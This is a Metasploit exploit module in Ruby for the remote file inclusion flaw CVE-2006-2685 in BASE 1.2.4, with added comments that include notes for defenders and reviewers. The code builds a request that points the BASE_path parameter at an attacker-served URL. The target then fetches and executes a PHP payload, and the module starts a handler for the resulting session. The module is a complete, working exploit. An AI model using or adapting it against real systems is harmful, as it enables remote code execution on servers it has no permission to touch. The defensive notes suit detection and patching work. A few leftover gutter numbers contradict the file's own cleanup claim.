1 ##
2 # This file is part of the Metasploit Framework and may be subject to
3 # redistribution and commercial restrictions. Please see the Metasploit
4 # Framework web site for more information on licensing and terms of use.
5 # http://metasploit.com/projects/Framework/
6 ##
7
8 require ’msf/core’
9
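# Metasploit module for the remote file inclusion flaw in the
# base_qry_common.php file of BASE 1.2.4 and earlier (CVE-2006-2685,
# BID 18298).
#
# This listing was recovered from a paginated print-out. Gutter numbers,
# page headers, typographic quotes and U+2212 minus signs were extraction
# damage and have been replaced with plain ASCII so the file parses.
#
# What the code shows: the PHPURI option holds a request path in which the
# marker !URL! is replaced by a percent-encoded URL (php_include_url). The
# default path puts that URL in the BASE_path query parameter.
#
# Notes for defenders:
# * Affected versions, per the module description: BASE 1.2.4 and earlier.
# * Requests of interest in web logs are those to base_qry_common.php whose
#   BASE_path parameter decodes to a URL. Every byte of the URL is sent as
#   %xx, so matching has to happen after URL-decoding the query string.
# * Besides upgrading BASE, PHP's allow_url_include / allow_url_fopen
#   settings govern whether include() may fetch remote URLs at all.
#   NOTE(review): the CVE entry reportedly also depends on register_globals;
#   confirm against the advisory.
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::HttpClient
  # Provides php_include_url, used in php_exploit below (mixin not shown here).
  include Msf::Exploit::Remote::HttpServer::PHPInclude

  # Registers the module metadata and its single option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BASE base_qry_common Remote File Include.',
      'Description'    => %q{
          This module exploits a remote file inclusion vulnerability in
        the base_qry_common.php file in BASE 1.2.4 and earlier.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision:$',
      'References'     =>
        [
          [ 'CVE', '2006-2685' ],
          [ 'BID', '18298' ],
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Space'       => 32768,
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      # NOTE(review): the CVE identifier above is from 2006 while this date
      # says 2008. It may be the module's own date; confirm against the advisory.
      'DisclosureDate' => 'Jun 14 2008',
      'DefaultTarget'  => 0))

    register_options(
      [
        # !URL! is a placeholder that php_exploit replaces before sending.
        OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!",
          "/base/base_qry_common.php?BASE_path=!URL!"]),
      ], self.class)
  end

  # Sends one HTTP request built from PHPURI, then calls handler.
  #
  # Prints an error only when a response arrives and its status is not 200.
  # The absence of a response is not treated as a failure.
  def php_exploit
    # The wait is only 10 ms, so `response` will often be nil.
    # NOTE(review): presumably no reply is needed once the request is sent; confirm.
    timeout = 0.01

    # Substitute the placeholder with the URL, each byte written as %xx.
    uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
    print_status("Trying uri #{uri}")

    response = send_request_raw({
      'global' => true,
      'uri'    => uri,
    }, timeout)

    if response && response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end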